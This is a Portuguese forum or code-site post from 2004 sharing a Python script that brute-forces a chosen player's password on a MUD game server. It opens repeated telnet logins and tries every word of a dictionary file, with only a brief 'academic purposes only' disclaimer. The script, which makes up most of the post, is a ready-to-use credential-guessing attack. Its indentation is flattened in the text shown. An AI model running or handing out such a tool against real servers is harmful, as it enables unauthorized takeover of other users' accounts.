Brute Force para MUD
Publicado por Karl Phillip 14/07/2004
[ Hits: 11.132 ]
Programa do tipo forca bruta para MUDs, escrito em Python por mim.
Tenta descobrir a senha de um jogador atraves de um dicionario de palavras, passando como parametro o Host e a Porta em que o jogo esta rodando.
Uso: ./mudbf.py end.do-mud.com 3000 JOGADOR dic_palavras.txt
Meus agradecimentos a <Aloysio de Paiva Figueiredo> pelo incentivo e muitas vezes suporte.
#!/usr/bin/python
#########################################################################################
### #
### This is a <Brute Force> program for MUD. #
### It was design fo academic purposes only. ***USE IT AT OWN RISC*** #
### Written in Python by: Karl Phillip #
### website: www.maxphil.cjb.net #
### em@il: max-phil@bol.com.br #
### Karl Phillip #
#########################################################################################
import sys, string
from telnetlib import Telnet
try:
host_name = sys.argv[1]
port = sys.argv[2]
ptarget = sys.argv[3]
fname = sys.argv[4]
except IndexError:
print ">> Usage: ./mudbf <host> <port> <playerTARGET> <passwdFILE)\n"
sys.exit(1)
try:
arq = open(fname)
arq.close()
except IOError:
print ">> Password file does not exist!\n"
sys.exit(1)
print "\n<PytHoN programmed/> _brute_force4MUD_"
print ""
print " http://www.maxphil.cjb.net"
print " by: Karl Phillip \n"
print " <Target>: %s" % host_name
print " <Port>: %s" % port
print " <Player>: %s\n" % ptarget
print ">> Trying passwords.. (this could take a few minutes)\n"
arq = open(fname)
login_sucess = "*** PRESS RETURN:"
login_new ="Did I get that righ"
numtries = 0
looping = False
while not looping:
for line in arq.readlines():
passwd = line
numtries += 1
vict = Telnet(host_name, port)
vict.write(ptarget+"\n")
vict.write(str(passwd)+"\n")
response = vict.read_until("Wrong password.", 12)
if string.count(response, login_new):
print "\n========================================="
print " *PLAYER NOT FOUND* in this MUD!"
print "=========================================\n"
arq.close()
vict.close()
sys.exit(1)
elif string.count(response, login_sucess):
print "\n <Passwords tried> %d" % int(numtries)
print "\n*User*: %s" % ptarget
print "*Password*: %s" % passwd
vict.close()
sys.exit(1)
else:
#print "Trying passwd: %s" % passwd
vict.close()
vict.close()
looping = True
arq.close()
vict.close()
print "\n <Passwords tried> %d" % int(numtries)
print "\n========================================="
print " *NO PASSWORD* was found in that file!"
print "=========================================\n"
DSearch - (Dir Search): script python para descobrir diretórios de servidores.
Krypt - Função de criptografia por chave de qualquer tamanho
Cracker De Senha (cupp.py) 1.0
RT CRASH - "Quebrando" hash MD5, SHA1, SHA224, SHA256, SHA384 e SHA512
Cirurgia para acelerar o openSUSE em HD externo via USB
Void Server como Domain Control
Modo Simples de Baixar e Usar o bash-completion
Monitorando o Preço do Bitcoin ou sua Cripto Favorita em Tempo Real com um Widget Flutuante
Como fazer a conversão binária e aplicar as restrições no Linux
Como quebrar a senha de um servidor Linux Debian
Como bloquear pendrive em uma rede Linux
Um autoinstall.yaml para Ubuntu com foco em quem vai fazer máquina virtual
Instalar GRUB sem archinstall no Arch Linux em UEFI Problemático









